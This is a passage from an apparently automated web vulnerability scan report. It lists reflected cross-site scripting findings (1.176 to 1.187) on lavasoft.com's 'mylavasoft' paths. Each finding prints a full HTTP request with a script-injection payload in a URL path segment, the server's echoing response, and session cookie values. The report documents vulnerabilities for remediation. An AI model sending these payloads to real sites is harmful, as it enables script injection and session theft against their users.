Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:21 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:21 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10618
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftea828'><script>alert(1)</script>1d6fa491fe7/misc/jquery.js?w'>
...[SNIP]...

1.176. http://www.lavasoft.com/mylavasoft/misc/jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cbb9c'><script>alert(1)</script>9be3172317 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misccbb9c'><script>alert(1)</script>9be3172317/jquery.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misccbb9c'><script>alert(1)</script>9be3172317/jquery.js'>
...[SNIP]...

1.177. http://www.lavasoft.com/mylavasoft/misc/jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/misc/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea8fd'><script>alert(1)</script>60b6de0a8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/misc/jquery.jsea8fd'><script>alert(1)</script>60b6de0a8cc?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18170
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/misc/jquery.jsea8fd'><script>alert(1)</script>60b6de0a8cc'>
...[SNIP]...

1.178. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc93e'><script>alert(1)</script>c92b17aa9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftcc93e'><script>alert(1)</script>c92b17aa9b/modules/forum/forum.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10626
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftcc93e'><script>alert(1)</script>c92b17aa9b/modules/forum/forum.css?w'>
...[SNIP]...

1.179. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a80a'><script>alert(1)</script>d08343746d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules7a80a'><script>alert(1)</script>d08343746d/forum/forum.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18242
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules7a80a'><script>alert(1)</script>d08343746d/forum/forum.css'>
...[SNIP]...

1.180. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9459e'><script>alert(1)</script>60483082767 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/forum9459e'><script>alert(1)</script>60483082767/forum.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/forum9459e'><script>alert(1)</script>60483082767/forum.css'>
...[SNIP]...

1.181. http://www.lavasoft.com/mylavasoft/modules/forum/forum.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/forum/forum.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82edb'><script>alert(1)</script>3e9ba5b1bc6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/forum/forum.css82edb'><script>alert(1)</script>3e9ba5b1bc6?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18206
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/forum/forum.css82edb'><script>alert(1)</script>3e9ba5b1bc6'>
...[SNIP]...

1.182. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 450c0'><script>alert(1)</script>e48049f0f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft450c0'><script>alert(1)</script>e48049f0f5/modules/img_assist/img_assist.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:14 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft450c0'><script>alert(1)</script>e48049f0f5/modules/img_assist/img_assist.css?w'>
...[SNIP]...

1.183. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55c3a'><script>alert(1)</script>4cd751fd905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules55c3a'><script>alert(1)</script>4cd751fd905/img_assist/img_assist.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18252
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules55c3a'><script>alert(1)</script>4cd751fd905/img_assist/img_assist.css'>
...[SNIP]...

1.184. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8f4b'><script>alert(1)</script>3e472aa4d6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assistb8f4b'><script>alert(1)</script>3e472aa4d6e/img_assist.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18214
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assistb8f4b'><script>alert(1)</script>3e472aa4d6e/img_assist.css'>
...[SNIP]...

1.185. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f909c'><script>alert(1)</script>f2d938a6d94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules/img_assist/img_assist.cssf909c'><script>alert(1)</script>f2d938a6d94?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18214
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/modules/img_assist/img_assist.cssf909c'><script>alert(1)</script>f2d938a6d94'>
...[SNIP]...

1.186. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1a65'><script>alert(1)</script>278b2720f83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoftb1a65'><script>alert(1)</script>278b2720f83/modules/img_assist/img_assist.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:15 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10636
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoftb1a65'><script>alert(1)</script>278b2720f83/modules/img_assist/img_assist.js?w'>
...[SNIP]...

1.187. http://www.lavasoft.com/mylavasoft/modules/img_assist/img_assist.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/modules/img_assist/img_assist.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45a38'><script>alert(1)</script>0315653ed5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/modules45a38'><script>alert(1)</script>0315653ed5b/img_assist/img_assist.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
